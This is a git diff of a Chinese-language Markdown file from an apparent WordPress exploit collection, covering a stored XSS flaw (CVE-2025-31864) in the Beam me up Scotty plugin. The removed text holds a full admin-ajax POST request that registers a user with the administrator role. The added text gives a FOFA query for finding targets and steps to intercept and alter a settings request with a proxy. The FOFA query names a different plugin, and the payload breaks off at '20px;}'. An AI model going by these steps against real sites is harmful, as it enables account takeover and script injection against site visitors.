diff --git a/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md b/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
index d4ce449..d552782 100644
--- a/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
+++ b/wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
@@ -1,45 +1,31 @@
## WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864)
+Beam me up Scotty 插件 1.0.23 及以下版本中,由于“返回顶部按钮”自定义设置的数据类型验证和转义处理不足,存在存储型跨站点脚本漏洞。
+这些自定义设置只有具有管理员权限的用户才能访问,如果具有管理员权限的攻击者利用此漏洞,则所有显示“返回顶部按钮”的页面的访问者都将面临跨站点脚本攻击。
+
## fofa
+
```
-"/wp-content/plugins/wp-automatic"
+body="/wp-content/plugins/web-directory-free"
```
+
## 第一步
-通过 /registration 或 /membership-registration 前端页面注册
-## 第二步,注册后,使用该请求数据
-```
-POST /wp-admin/admin-ajax.php HTTP/1.1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
-Accept: */*
-Host: hackthebox.test
-Accept-Encoding: gzip, deflate, br
-Connection: keep-alive
-Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
+导航到自定义“返回顶部按钮”的菜单(/wp-admin/themes.php?page=beam-me-up-scotty_settings)
+
-----------------------------189123966817005614765335
-Content-Disposition: form-data; name="action"
-
-user_registration_membership_register_member
-----------------------------189123966817005614765335
-Content-Disposition: form-data; name="security"
-
-THE_NONCE_HERE
-----------------------------189123966817005614765335
-Content-Disposition: form-data; name="members_data"
-
-{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
-----------------------------189123966817005614765335--
+## 第二步
+在启用了代理工具(例如BurpSuite)拦截的情况下,点击‘返回顶部按钮’设置菜单底部的‘保存’按钮,即可拦截保存‘返回顶部按钮’自定义设置的请求包。
+
+将请求payload中payload的值改为beam_me_up_scotty_bottom_indentation如下,然后执行Forward
```
-## 第三步,返回相应包如下
+20px;}